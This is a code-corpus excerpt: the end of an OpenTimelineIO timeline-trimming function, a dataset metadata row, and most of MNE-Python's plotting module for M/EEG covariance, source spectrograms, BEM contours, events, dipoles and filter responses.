new_timeline.tracks[track_num] = track_algo.track_trimmed_to_range(
child_track,
trim_range
)
return new_timeline
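# A minimal usage sketch, assuming ``timeline`` is an existing
# ``otio.schema.Timeline``: trim it to its first second at 24 fps. The
# trim_range is expressed in the timeline's global space.
#
#   import opentimelineio as otio
#
#   trim = otio.opentime.TimeRange(
#       start_time=otio.opentime.RationalTime(0, 24),
#       duration=otio.opentime.RationalTime(24, 24),
#   )
#   trimmed = otio.algorithms.timeline_trimmed_to_range(timeline, trim)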
| src/py-opentimelineio/opentimelineio/algorithms/timeline_algo.py | 2,216 | | 1,697 | en | 0.887729 |
# -*- coding: utf-8 -*-
"""Functions to make simple plots with M/EEG data."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Cathy Nangini <cnangini@gmail.com>
# Mainak Jas <mainak@neuro.hut.fi>
#
# License: Simplified BSD
import base64
import copy
from glob import glob
from io import BytesIO
from itertools import cycle
import os.path as op
import warnings
from distutils.version import LooseVersion
from collections import defaultdict
import numpy as np
from scipy import linalg
from ..defaults import DEFAULTS
from ..fixes import _get_img_fdata
from ..rank import compute_rank
from ..source_space import _mri_orientation
from ..surface import read_surface
from ..io.constants import FIFF
from ..io.proj import make_projector
from ..io.pick import (_DATA_CH_TYPES_SPLIT, pick_types, pick_info,
pick_channels)
from ..source_space import (read_source_spaces, SourceSpaces, _read_mri_info,
_check_mri, _ensure_src)
from ..transforms import invert_transform, apply_trans, _frame_to_str
from ..utils import (logger, verbose, warn, _check_option, get_subjects_dir,
_mask_to_onsets_offsets, _pl, _on_missing)
from ..io.pick import _picks_by_type
from ..filter import estimate_ringing_samples
from .utils import tight_layout, _get_color_list, _prepare_trellis, plt_show
def _index_info_cov(info, cov, exclude):
if exclude == 'bads':
exclude = info['bads']
info = pick_info(info, pick_channels(info['ch_names'], cov['names'],
exclude))
del exclude
picks_list = \
_picks_by_type(info, meg_combined=False, ref_meg=False,
exclude=())
picks_by_type = dict(picks_list)
ch_names = [n for n in cov.ch_names if n in info['ch_names']]
ch_idx = [cov.ch_names.index(n) for n in ch_names]
info_ch_names = info['ch_names']
idx_by_type = defaultdict(list)
for ch_type, sel in picks_by_type.items():
idx_by_type[ch_type] = [ch_names.index(info_ch_names[c])
for c in sel if info_ch_names[c] in ch_names]
idx_names = [(idx_by_type[key],
'%s covariance' % DEFAULTS['titles'][key],
DEFAULTS['units'][key],
DEFAULTS['scalings'][key],
key)
for key in _DATA_CH_TYPES_SPLIT
if len(idx_by_type[key]) > 0]
C = cov.data[ch_idx][:, ch_idx]
return info, C, ch_names, idx_names
@verbose
def plot_cov(cov, info, exclude=(), colorbar=True, proj=False, show_svd=True,
show=True, verbose=None):
"""Plot Covariance data.
Parameters
----------
cov : instance of Covariance
The covariance matrix.
info : dict
Measurement info.
exclude : list of str | str
List of channels to exclude. If empty do not exclude any channel.
If 'bads', exclude info['bads'].
colorbar : bool
Show colorbar or not.
proj : bool
Apply projections or not.
show_svd : bool
Plot also singular values of the noise covariance for each sensor
        type. We show square roots, i.e., standard deviations.
show : bool
Show figure if True.
%(verbose)s
Returns
-------
fig_cov : instance of matplotlib.figure.Figure
The covariance plot.
fig_svd : instance of matplotlib.figure.Figure | None
The SVD spectra plot of the covariance.
See Also
--------
mne.compute_rank
Notes
-----
For each channel type, the rank is estimated using
:func:`mne.compute_rank`.
.. versionchanged:: 0.19
Approximate ranks for each channel type are shown with red dashed lines.
"""
from ..cov import Covariance
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
info, C, ch_names, idx_names = _index_info_cov(info, cov, exclude)
del cov, exclude
projs = []
if proj:
projs = copy.deepcopy(info['projs'])
# Activate the projection items
for p in projs:
p['active'] = True
P, ncomp, _ = make_projector(projs, ch_names)
if ncomp > 0:
logger.info(' Created an SSP operator (subspace dimension'
' = %d)' % ncomp)
C = np.dot(P, np.dot(C, P.T))
else:
logger.info(' The projection vectors do not apply to these '
'channels.')
fig_cov, axes = plt.subplots(1, len(idx_names), squeeze=False,
figsize=(3.8 * len(idx_names), 3.7))
for k, (idx, name, _, _, _) in enumerate(idx_names):
vlim = np.max(np.abs(C[idx][:, idx]))
im = axes[0, k].imshow(C[idx][:, idx], interpolation="nearest",
norm=Normalize(vmin=-vlim, vmax=vlim),
cmap='RdBu_r')
axes[0, k].set(title=name)
if colorbar:
from mpl_toolkits.axes_grid1 import make_axes_locatable
divider = make_axes_locatable(axes[0, k])
cax = divider.append_axes("right", size="5.5%", pad=0.05)
plt.colorbar(im, cax=cax, format='%.0e')
fig_cov.subplots_adjust(0.04, 0.0, 0.98, 0.94, 0.2, 0.26)
tight_layout(fig=fig_cov)
fig_svd = None
if show_svd:
fig_svd, axes = plt.subplots(1, len(idx_names), squeeze=False,
figsize=(3.8 * len(idx_names), 3.7))
for k, (idx, name, unit, scaling, key) in enumerate(idx_names):
this_C = C[idx][:, idx]
s = linalg.svd(this_C, compute_uv=False)
this_C = Covariance(this_C, [info['ch_names'][ii] for ii in idx],
[], [], 0)
this_info = pick_info(info, idx)
this_info['projs'] = []
this_rank = compute_rank(this_C, info=this_info)
# Protect against true zero singular values
s[s <= 0] = 1e-10 * s[s > 0].min()
s = np.sqrt(s) * scaling
axes[0, k].plot(s, color='k', zorder=3)
this_rank = this_rank[key]
axes[0, k].axvline(this_rank - 1, ls='--', color='r',
alpha=0.5, zorder=4, clip_on=False)
axes[0, k].text(this_rank - 1, axes[0, k].get_ylim()[1],
'rank ≈ %d' % (this_rank,), ha='right', va='top',
color='r', alpha=0.5, zorder=4)
axes[0, k].set(ylabel=u'Noise σ (%s)' % unit, yscale='log',
xlabel='Eigenvalue index', title=name,
xlim=[0, len(s) - 1])
tight_layout(fig=fig_svd)
plt_show(show)
return fig_cov, fig_svd
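# A minimal usage sketch, assuming ``epochs`` is an existing :class:`mne.Epochs`
# instance; the pre-stimulus window (``tmax=0.``) is a common noise estimate:
#
#   import mne
#   cov = mne.compute_covariance(epochs, tmax=0.)
#   fig_cov, fig_svd = plot_cov(cov, epochs.info)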
def plot_source_spectrogram(stcs, freq_bins, tmin=None, tmax=None,
source_index=None, colorbar=False, show=True):
"""Plot source power in time-freqency grid.
Parameters
----------
stcs : list of SourceEstimate
Source power for consecutive time windows, one SourceEstimate object
should be provided for each frequency bin.
freq_bins : list of tuples of float
Start and end points of frequency bins of interest.
tmin : float
Minimum time instant to show.
tmax : float
Maximum time instant to show.
source_index : int | None
Index of source for which the spectrogram will be plotted. If None,
the source with the largest activation will be selected.
colorbar : bool
If true, a colorbar will be added to the plot.
show : bool
Show figure if True.
Returns
-------
fig : instance of Figure
The figure.
"""
import matplotlib.pyplot as plt
# Input checks
if len(stcs) == 0:
raise ValueError('cannot plot spectrogram if len(stcs) == 0')
stc = stcs[0]
if tmin is not None and tmin < stc.times[0]:
raise ValueError('tmin cannot be smaller than the first time point '
'provided in stcs')
if tmax is not None and tmax > stc.times[-1] + stc.tstep:
raise ValueError('tmax cannot be larger than the sum of the last time '
'point and the time step, which are provided in stcs')
# Preparing time-frequency cell boundaries for plotting
if tmin is None:
tmin = stc.times[0]
if tmax is None:
tmax = stc.times[-1] + stc.tstep
time_bounds = np.arange(tmin, tmax + stc.tstep, stc.tstep)
freq_bounds = sorted(set(np.ravel(freq_bins)))
freq_ticks = copy.deepcopy(freq_bounds)
# Reject time points that will not be plotted and gather results
source_power = []
for stc in stcs:
stc = stc.copy() # copy since crop modifies inplace
stc.crop(tmin, tmax - stc.tstep)
source_power.append(stc.data)
source_power = np.array(source_power)
# Finding the source with maximum source power
if source_index is None:
source_index = np.unravel_index(source_power.argmax(),
source_power.shape)[1]
# If there is a gap in the frequency bins record its locations so that it
# can be covered with a gray horizontal bar
gap_bounds = []
for i in range(len(freq_bins) - 1):
lower_bound = freq_bins[i][1]
upper_bound = freq_bins[i + 1][0]
if lower_bound != upper_bound:
freq_bounds.remove(lower_bound)
gap_bounds.append((lower_bound, upper_bound))
# Preparing time-frequency grid for plotting
time_grid, freq_grid = np.meshgrid(time_bounds, freq_bounds)
# Plotting the results
fig = plt.figure(figsize=(9, 6))
plt.pcolor(time_grid, freq_grid, source_power[:, source_index, :],
cmap='Reds')
ax = plt.gca()
ax.set(title='Source power', xlabel='Time (s)', ylabel='Frequency (Hz)')
time_tick_labels = [str(np.round(t, 2)) for t in time_bounds]
n_skip = 1 + len(time_bounds) // 10
for i in range(len(time_bounds)):
if i % n_skip != 0:
time_tick_labels[i] = ''
ax.set_xticks(time_bounds)
ax.set_xticklabels(time_tick_labels)
plt.xlim(time_bounds[0], time_bounds[-1])
plt.yscale('log')
ax.set_yticks(freq_ticks)
ax.set_yticklabels([np.round(freq, 2) for freq in freq_ticks])
plt.ylim(freq_bounds[0], freq_bounds[-1])
plt.grid(True, ls='-')
if colorbar:
plt.colorbar()
tight_layout(fig=fig)
# Covering frequency gaps with horizontal bars
for lower_bound, upper_bound in gap_bounds:
plt.barh(lower_bound, time_bounds[-1] - time_bounds[0], upper_bound -
lower_bound, time_bounds[0], color='#666666')
plt_show(show)
return fig
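# A minimal usage sketch, assuming ``stcs`` already holds one SourceEstimate of
# source power per frequency bin (e.g. from a time-frequency beamformer):
#
#   freq_bins = [(4., 12.), (12., 30.), (30., 55.)]
#   fig = plot_source_spectrogram(stcs, freq_bins, colorbar=True)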
def _plot_mri_contours(mri_fname, surfaces, src, orientation='coronal',
slices=None, show=True, show_indices=False,
show_orientation=False, img_output=False):
"""Plot BEM contours on anatomical slices."""
import matplotlib.pyplot as plt
from matplotlib import patheffects
# For ease of plotting, we will do everything in voxel coordinates.
_check_option('orientation', orientation, ('coronal', 'axial', 'sagittal'))
# Load the T1 data
_, vox_mri_t, _, _, _, nim = _read_mri_info(
mri_fname, units='mm', return_img=True)
mri_vox_t = invert_transform(vox_mri_t)['trans']
del vox_mri_t
# plot axes (x, y, z) as data axes
(x, y, z), (flip_x, flip_y, flip_z), order = _mri_orientation(
nim, orientation)
transpose = x < y
data = _get_img_fdata(nim)
shift_x = data.shape[x] if flip_x < 0 else 0
shift_y = data.shape[y] if flip_y < 0 else 0
n_slices = data.shape[z]
if slices is None:
slices = np.round(np.linspace(0, n_slices - 1, 14)).astype(int)[1:-1]
slices = np.atleast_1d(slices).copy()
slices[slices < 0] += n_slices # allow negative indexing
if not np.array_equal(np.sort(slices), slices) or slices.ndim != 1 or \
slices.size < 1 or slices[0] < 0 or slices[-1] >= n_slices or \
slices.dtype.kind not in 'iu':
raise ValueError('slices must be a sorted 1D array of int with unique '
'elements, at least one element, and no elements '
'greater than %d, got %s' % (n_slices - 1, slices))
if flip_z < 0:
        # Proceed in the opposite order to maintain left-to-right orientation
slices = slices[::-1]
    # create a list of surfaces
surfs = list()
for file_name, color in surfaces:
surf = dict()
surf['rr'], surf['tris'] = read_surface(file_name)
# move surface to voxel coordinate system
surf['rr'] = apply_trans(mri_vox_t, surf['rr'])
surfs.append((surf, color))
sources = list()
if src is not None:
_ensure_src(src, extra=' or None')
# Eventually we can relax this by allowing ``trans`` if need be
if src[0]['coord_frame'] != FIFF.FIFFV_COORD_MRI:
raise ValueError(
'Source space must be in MRI coordinates, got '
f'{_frame_to_str[src[0]["coord_frame"]]}')
for src_ in src:
points = src_['rr'][src_['inuse'].astype(bool)]
sources.append(apply_trans(mri_vox_t, points * 1e3))
sources = np.concatenate(sources, axis=0)
if img_output:
n_col = n_axes = 1
fig, ax = plt.subplots(1, 1, figsize=(7.0, 7.0))
axs = [ax] * len(slices)
w = fig.get_size_inches()[0]
fig.set_size_inches([w, w / data.shape[x] * data.shape[y]])
plt.close(fig)
else:
n_col = 4
fig, axs, _, _ = _prepare_trellis(len(slices), n_col)
n_axes = len(axs)
fig.set_facecolor('k')
bounds = np.concatenate(
[[-np.inf], slices[:-1] + np.diff(slices) / 2., [np.inf]]) # float
slicer = [slice(None)] * 3
ori_labels = dict(R='LR', A='PA', S='IS')
xlabels, ylabels = ori_labels[order[0]], ori_labels[order[1]]
path_effects = [patheffects.withStroke(linewidth=4, foreground="k",
alpha=0.75)]
out = list() if img_output else fig
for ai, (ax, sl, lower, upper) in enumerate(zip(
axs, slices, bounds[:-1], bounds[1:])):
# adjust the orientations for good view
slicer[z] = sl
dat = data[tuple(slicer)]
dat = dat.T if transpose else dat
dat = dat[::flip_y, ::flip_x]
# First plot the anatomical data
if img_output:
ax.clear()
ax.imshow(dat, cmap=plt.cm.gray, origin='lower')
ax.set_autoscale_on(False)
ax.axis('off')
ax.set_aspect('equal') # XXX eventually could deal with zooms
# and then plot the contours on top
for surf, color in surfs:
with warnings.catch_warnings(record=True): # ignore contour warn
warnings.simplefilter('ignore')
ax.tricontour(flip_x * surf['rr'][:, x] + shift_x,
flip_y * surf['rr'][:, y] + shift_y,
surf['tris'], surf['rr'][:, z],
levels=[sl], colors=color, linewidths=1.0,
zorder=1)
if len(sources):
in_slice = (sources[:, z] >= lower) & (sources[:, z] < upper)
ax.scatter(flip_x * sources[in_slice, x] + shift_x,
flip_y * sources[in_slice, y] + shift_y,
marker='.', color='#FF00FF', s=1, zorder=2)
if show_indices:
ax.text(dat.shape[1] // 8 + 0.5, 0.5, str(sl),
color='w', fontsize='x-small', va='bottom', ha='left')
# label the axes
kwargs = dict(
color='#66CCEE', fontsize='medium', path_effects=path_effects,
family='monospace', clip_on=False, zorder=5, weight='bold')
if show_orientation:
if ai % n_col == 0: # left
ax.text(0, dat.shape[0] / 2., xlabels[0],
va='center', ha='left', **kwargs)
if ai % n_col == n_col - 1 or ai == n_axes - 1: # right
ax.text(dat.shape[1] - 1, dat.shape[0] / 2., xlabels[1],
va='center', ha='right', **kwargs)
if ai >= n_axes - n_col: # bottom
ax.text(dat.shape[1] / 2., 0, ylabels[0],
ha='center', va='bottom', **kwargs)
if ai < n_col or n_col == 1: # top
ax.text(dat.shape[1] / 2., dat.shape[0] - 1, ylabels[1],
ha='center', va='top', **kwargs)
if img_output:
output = BytesIO()
fig.savefig(output, bbox_inches='tight',
pad_inches=0, format='png')
out.append(base64.b64encode(output.getvalue()).decode('ascii'))
fig.subplots_adjust(left=0., bottom=0., right=1., top=1., wspace=0.,
hspace=0.)
plt_show(show, fig=fig)
return out
def plot_bem(subject=None, subjects_dir=None, orientation='coronal',
slices=None, brain_surfaces=None, src=None, show=True,
show_indices=True, mri='T1.mgz', show_orientation=True):
"""Plot BEM contours on anatomical slices.
Parameters
----------
subject : str
Subject name.
subjects_dir : str | None
Path to the SUBJECTS_DIR. If None, the path is obtained by using
the environment variable SUBJECTS_DIR.
orientation : str
'coronal' or 'axial' or 'sagittal'.
slices : list of int
Slice indices.
brain_surfaces : None | str | list of str
One or more brain surface to plot (optional). Entries should correspond
to files in the subject's ``surf`` directory (e.g. ``"white"``).
src : None | SourceSpaces | str
SourceSpaces instance or path to a source space to plot individual
sources as scatter-plot. Sources will be shown on exactly one slice
(whichever slice is closest to each source in the given orientation
plane). Path can be absolute or relative to the subject's ``bem``
folder.
.. versionchanged:: 0.20
All sources are shown on the nearest slice rather than some
being omitted.
show : bool
Show figure if True.
show_indices : bool
Show slice indices if True.
.. versionadded:: 0.20
mri : str
The name of the MRI to use. Can be a standard FreeSurfer MRI such as
``'T1.mgz'``, or a full path to a custom MRI file.
.. versionadded:: 0.21
show_orientation : str
Show the orientation (L/R, P/A, I/S) of the data slices.
.. versionadded:: 0.21
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
mne.viz.plot_alignment
Notes
-----
Images are plotted in MRI voxel coordinates.
If ``src`` is not None, for a given slice index, all source points are
shown that are halfway between the previous slice and the given slice,
and halfway between the given slice and the next slice.
For large slice decimations, this can
make some source points appear outside the BEM contour, which is shown
for the given slice index. For example, in the case where the single
midpoint slice is used ``slices=[128]``, all source points will be shown
on top of the midpoint MRI slice with the BEM boundary drawn for that
slice.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
mri_fname = _check_mri(mri, subject, subjects_dir)
# Get the BEM surface filenames
bem_path = op.join(subjects_dir, subject, 'bem')
if not op.isdir(bem_path):
raise IOError('Subject bem directory "%s" does not exist' % bem_path)
surfaces = _get_bem_plotting_surfaces(bem_path)
if brain_surfaces is not None:
if isinstance(brain_surfaces, str):
brain_surfaces = (brain_surfaces,)
for surf_name in brain_surfaces:
for hemi in ('lh', 'rh'):
surf_fname = op.join(subjects_dir, subject, 'surf',
hemi + '.' + surf_name)
if op.exists(surf_fname):
surfaces.append((surf_fname, '#00DD00'))
else:
raise IOError("Surface %s does not exist." % surf_fname)
if isinstance(src, str):
if not op.exists(src):
src_ = op.join(subjects_dir, subject, 'bem', src)
if op.exists(src_):
src = src_
else:
raise IOError("%s does not exist" % src)
src = read_source_spaces(src)
elif src is not None and not isinstance(src, SourceSpaces):
raise TypeError("src needs to be None, str or SourceSpaces instance, "
"not %s" % repr(src))
if len(surfaces) == 0:
raise IOError('No surface files found. Surface files must end with '
'inner_skull.surf, outer_skull.surf or outer_skin.surf')
# Plot the contours
return _plot_mri_contours(mri_fname, surfaces, src, orientation, slices,
show, show_indices, show_orientation)
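# A minimal usage sketch, assuming the FreeSurfer ``sample`` subject lives
# under ``subjects_dir``:
#
#   fig = plot_bem(subject='sample', subjects_dir=subjects_dir,
#                  orientation='coronal', slices=[50, 100, 150, 200])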
def _get_bem_plotting_surfaces(bem_path):
surfaces = []
for surf_name, color in (('*inner_skull', '#FF0000'),
('*outer_skull', '#FFFF00'),
('*outer_skin', '#FFAA80')):
surf_fname = glob(op.join(bem_path, surf_name + '.surf'))
if len(surf_fname) > 0:
surf_fname = surf_fname[0]
logger.info("Using surface: %s" % surf_fname)
surfaces.append((surf_fname, color))
return surfaces
@verbose
def plot_events(events, sfreq=None, first_samp=0, color=None, event_id=None,
axes=None, equal_spacing=True, show=True, on_missing='raise',
verbose=None):
"""Plot events to get a visual display of the paradigm.
Parameters
----------
events : array, shape (n_events, 3)
The events.
sfreq : float | None
The sample frequency. If None, data will be displayed in samples (not
seconds).
first_samp : int
The index of the first sample. Recordings made on Neuromag systems
number samples relative to the system start (not relative to the
beginning of the recording). In such cases the ``raw.first_samp``
attribute can be passed here. Default is 0.
color : dict | None
Dictionary of event_id integers as keys and colors as values. If None,
        colors are automatically drawn from a default list (cycled through if
        there are more events than default colors). Color can be any
valid :doc:`matplotlib color <tutorials/colors/colors>`.
event_id : dict | None
Dictionary of event labels (e.g. 'aud_l') as keys and their associated
event_id values. Labels are used to plot a legend. If None, no legend
is drawn.
axes : instance of Axes
The subplot handle.
equal_spacing : bool
Use equal spacing between events in y-axis.
show : bool
Show figure if True.
%(on_missing_events)s
%(verbose)s
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
"""
if sfreq is None:
sfreq = 1.0
xlabel = 'Samples'
else:
xlabel = 'Time (s)'
events = np.asarray(events)
if len(events) == 0:
raise ValueError('No events in events array, cannot plot.')
unique_events = np.unique(events[:, 2])
if event_id is not None:
# get labels and unique event ids from event_id dict,
# sorted by value
event_id_rev = {v: k for k, v in event_id.items()}
conditions, unique_events_id = zip(*sorted(event_id.items(),
key=lambda x: x[1]))
keep = np.ones(len(unique_events_id), bool)
for ii, this_event in enumerate(unique_events_id):
if this_event not in unique_events:
msg = f'{this_event} from event_id is not present in events.'
_on_missing(on_missing, msg)
keep[ii] = False
conditions = [cond for cond, k in zip(conditions, keep) if k]
unique_events_id = [id_ for id_, k in zip(unique_events_id, keep) if k]
if len(unique_events_id) == 0:
raise RuntimeError('No usable event IDs found')
for this_event in unique_events:
if this_event not in unique_events_id:
warn('event %s missing from event_id will be ignored'
% this_event)
else:
unique_events_id = unique_events
color = _handle_event_colors(color, unique_events, event_id)
import matplotlib.pyplot as plt
fig = None
if axes is None:
fig = plt.figure()
ax = axes if axes else plt.gca()
unique_events_id = np.array(unique_events_id)
min_event = np.min(unique_events_id)
max_event = np.max(unique_events_id)
max_x = (events[np.in1d(events[:, 2], unique_events_id), 0].max() -
first_samp) / sfreq
handles, labels = list(), list()
for idx, ev in enumerate(unique_events_id):
ev_mask = events[:, 2] == ev
count = ev_mask.sum()
if count == 0:
continue
y = np.full(count, idx + 1 if equal_spacing else events[ev_mask, 2][0])
if event_id is not None:
event_label = '%s (%s)' % (event_id_rev[ev], count)
else:
event_label = 'N=%d' % (count,)
labels.append(event_label)
kwargs = {}
if ev in color:
kwargs['color'] = color[ev]
handles.append(
ax.plot((events[ev_mask, 0] - first_samp) / sfreq,
y, '.', clip_on=False, **kwargs)[0])
if equal_spacing:
ax.set_ylim(0, unique_events_id.size + 1)
ax.set_yticks(1 + np.arange(unique_events_id.size))
ax.set_yticklabels(unique_events_id)
else:
ax.set_ylim([min_event - 1, max_event + 1])
ax.set(xlabel=xlabel, ylabel='Events id', xlim=[0, max_x])
ax.grid(True)
fig = fig if fig is not None else plt.gcf()
# reverse order so that the highest numbers are at the top
# (match plot order)
handles, labels = handles[::-1], labels[::-1]
box = ax.get_position()
factor = 0.8 if event_id is not None else 0.9
ax.set_position([box.x0, box.y0, box.width * factor, box.height])
ax.legend(handles, labels, loc='center left', bbox_to_anchor=(1, 0.5),
fontsize='small')
fig.canvas.draw()
plt_show(show)
return fig
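# A minimal usage sketch, assuming ``raw`` is an :class:`mne.io.Raw` instance
# with a Neuromag-style stimulus channel named 'STI 014':
#
#   import mne
#   events = mne.find_events(raw, stim_channel='STI 014')
#   fig = plot_events(events, sfreq=raw.info['sfreq'],
#                     first_samp=raw.first_samp)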
def _get_presser(fig):
"""Get our press callback."""
import matplotlib
callbacks = fig.canvas.callbacks.callbacks['button_press_event']
func = None
for key, val in callbacks.items():
if LooseVersion(matplotlib.__version__) >= '3':
func = val()
else:
func = val.func
if func.__class__.__name__ == 'partial':
break
else:
func = None
assert func is not None
return func
def plot_dipole_amplitudes(dipoles, colors=None, show=True):
"""Plot the amplitude traces of a set of dipoles.
Parameters
----------
dipoles : list of instance of Dipole
The dipoles whose amplitudes should be shown.
colors : list of color | None
Color to plot with each dipole. If None default colors are used.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
"""
import matplotlib.pyplot as plt
if colors is None:
colors = cycle(_get_color_list())
fig, ax = plt.subplots(1, 1)
xlim = [np.inf, -np.inf]
for dip, color in zip(dipoles, colors):
ax.plot(dip.times, dip.amplitude * 1e9, color=color, linewidth=1.5)
xlim[0] = min(xlim[0], dip.times[0])
xlim[1] = max(xlim[1], dip.times[-1])
ax.set(xlim=xlim, xlabel='Time (s)', ylabel='Amplitude (nAm)')
if show:
fig.show(warn=False)
return fig
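# A minimal usage sketch, assuming ``fname_dip`` points to a dipole file saved
# by a previous dipole fit (e.g. :func:`mne.fit_dipole` then ``dip.save``):
#
#   import mne
#   fig = plot_dipole_amplitudes([mne.read_dipole(fname_dip)])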
def adjust_axes(axes, remove_spines=('top', 'right'), grid=True):
"""Adjust some properties of axes.
Parameters
----------
axes : list
List of axes to process.
remove_spines : list of str
Which axis spines to remove.
grid : bool
Turn grid on (True) or off (False).
"""
axes = [axes] if not isinstance(axes, (list, tuple, np.ndarray)) else axes
for ax in axes:
if grid:
ax.grid(zorder=0)
for key in remove_spines:
ax.spines[key].set_visible(False)
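# A minimal usage sketch: strip the top/right spines of a fresh Axes and turn
# its grid on.
#
#   import matplotlib.pyplot as plt
#   fig, ax = plt.subplots()
#   adjust_axes(ax)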
def _filter_ticks(lims, fscale):
"""Create approximately spaced ticks between lims."""
if fscale == 'linear':
return None, None # let matplotlib handle it
lims = np.array(lims)
ticks = list()
if lims[1] > 20 * lims[0]:
base = np.array([1, 2, 4])
else:
base = np.arange(1, 11)
for exp in range(int(np.floor(np.log10(lims[0]))),
int(np.floor(np.log10(lims[1]))) + 1):
ticks += (base * (10 ** exp)).tolist()
ticks = np.array(ticks)
ticks = ticks[(ticks >= lims[0]) & (ticks <= lims[1])]
ticklabels = [('%g' if t < 1 else '%d') % t for t in ticks]
return ticks, ticklabels
def _get_flim(flim, fscale, freq, sfreq=None):
"""Get reasonable frequency limits."""
if flim is None:
if freq is None:
flim = [0.1 if fscale == 'log' else 0., sfreq / 2.]
else:
if fscale == 'linear':
flim = [freq[0]]
else:
flim = [freq[0] if freq[0] > 0 else 0.1 * freq[1]]
flim += [freq[-1]]
if fscale == 'log':
if flim[0] <= 0:
raise ValueError('flim[0] must be positive, got %s' % flim[0])
elif flim[0] < 0:
raise ValueError('flim[0] must be non-negative, got %s' % flim[0])
return flim
def _check_fscale(fscale):
"""Check for valid fscale."""
if not isinstance(fscale, str) or fscale not in ('log', 'linear'):
raise ValueError('fscale must be "log" or "linear", got %s'
% (fscale,))
_DEFAULT_ALIM = (-80, 10)
def plot_filter(h, sfreq, freq=None, gain=None, title=None, color='#1f77b4',
flim=None, fscale='log', alim=_DEFAULT_ALIM, show=True,
compensate=False, plot=('time', 'magnitude', 'delay'),
axes=None):
"""Plot properties of a filter.
Parameters
----------
h : dict or ndarray
An IIR dict or 1D ndarray of coefficients (for FIR filter).
sfreq : float
Sample rate of the data (Hz).
freq : array-like or None
The ideal response frequencies to plot (must be in ascending order).
If None (default), do not plot the ideal response.
gain : array-like or None
The ideal response gains to plot.
If None (default), do not plot the ideal response.
title : str | None
The title to use. If None (default), determine the title based
on the type of the system.
color : color object
The color to use (default '#1f77b4').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None, freq will be used. If None (default) and freq is None,
``(0.1, sfreq / 2.)`` will be used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
    alim : tuple
        The y-axis amplitude limits (dB) to use (default: (-80, 10)).
show : bool
Show figure if True (default).
compensate : bool
If True, compensate for the filter delay (phase will not be shown).
- For linear-phase FIR filters, this visualizes the filter coefficients
assuming that the output will be shifted by ``N // 2``.
- For IIR filters, this changes the filter coefficient display
by filtering backward and forward, and the frequency response
by squaring it.
.. versionadded:: 0.18
plot : list | tuple | str
A list of the requested plots from ``time``, ``magnitude`` and
``delay``. Default is to plot all three filter properties
('time', 'magnitude', 'delay').
.. versionadded:: 0.21.0
axes : instance of Axes | list | None
The axes to plot to. If list, the list must be a list of Axes of
the same length as the number of requested plot types. If instance of
Axes, there must be only one filter property plotted.
Defaults to ``None``.
.. versionadded:: 0.21.0
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the plots.
See Also
--------
mne.filter.create_filter
plot_ideal_filter
Notes
-----
.. versionadded:: 0.14
"""
from scipy.signal import (
freqz, group_delay, lfilter, filtfilt, sosfilt, sosfiltfilt)
import matplotlib.pyplot as plt
sfreq = float(sfreq)
_check_option('fscale', fscale, ['log', 'linear'])
if isinstance(plot, str):
plot = [plot]
for xi, x in enumerate(plot):
_check_option('plot[%d]' % xi, x, ('magnitude', 'delay', 'time'))
flim = _get_flim(flim, fscale, freq, sfreq)
if fscale == 'log':
omega = np.logspace(np.log10(flim[0]), np.log10(flim[1]), 1000)
else:
omega = np.linspace(flim[0], flim[1], 1000)
xticks, xticklabels = _filter_ticks(flim, fscale)
omega /= sfreq / (2 * np.pi)
    if isinstance(h, dict):  # IIR filter given as dict ('sos' or 'b'/'a')
if 'sos' in h:
H = np.ones(len(omega), np.complex128)
gd = np.zeros(len(omega))
for section in h['sos']:
this_H = freqz(section[:3], section[3:], omega)[1]
H *= this_H
if compensate:
H *= this_H.conj() # time reversal is freq conj
else:
# Assume the forward-backward delay zeros out, which it
# mostly should
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd += group_delay((section[:3], section[3:]), omega)[1]
n = estimate_ringing_samples(h['sos'])
delta = np.zeros(n)
delta[0] = 1
if compensate:
delta = np.pad(delta, [(n - 1, 0)], 'constant')
func = sosfiltfilt
gd += (len(delta) - 1) // 2
else:
func = sosfilt
h = func(h['sos'], delta)
else:
H = freqz(h['b'], h['a'], omega)[1]
if compensate:
H *= H.conj()
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd = group_delay((h['b'], h['a']), omega)[1]
if compensate:
                gd += group_delay((h['b'].conj(), h['a'].conj()), omega)[1]
n = estimate_ringing_samples((h['b'], h['a']))
delta = np.zeros(n)
delta[0] = 1
if compensate:
delta = np.pad(delta, [(n - 1, 0)], 'constant')
func = filtfilt
else:
func = lfilter
h = func(h['b'], h['a'], delta)
if title is None:
title = 'SOS (IIR) filter'
if compensate:
title += ' (forward-backward)'
else:
H = freqz(h, worN=omega)[1]
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd = group_delay((h, [1.]), omega)[1]
title = 'FIR filter' if title is None else title
if compensate:
title += ' (delay-compensated)'
fig = None
if axes is None:
fig, axes = plt.subplots(len(plot), 1)
if isinstance(axes, plt.Axes):
axes = [axes]
elif isinstance(axes, np.ndarray):
axes = list(axes)
if fig is None:
fig = axes[0].get_figure()
if len(axes) != len(plot):
raise ValueError('Length of axes (%d) must be the same as number of '
'requested filter properties (%d)'
% (len(axes), len(plot)))
t = np.arange(len(h))
dlim = np.abs(t).max() / 2.
dlim = [-dlim, dlim]
if compensate:
n_shift = (len(h) - 1) // 2
t -= n_shift
assert t[0] == -t[-1]
gd -= n_shift
t = t / sfreq
gd = gd / sfreq
f = omega * sfreq / (2 * np.pi)
sl = slice(0 if fscale == 'linear' else 1, None, None)
mag = 10 * np.log10(np.maximum((H * H.conj()).real, 1e-20))
if 'time' in plot:
ax_time_idx = np.where([p == 'time' for p in plot])[0][0]
axes[ax_time_idx].plot(t, h, color=color)
axes[ax_time_idx].set(xlim=t[[0, -1]], xlabel='Time (s)',
ylabel='Amplitude', title=title)
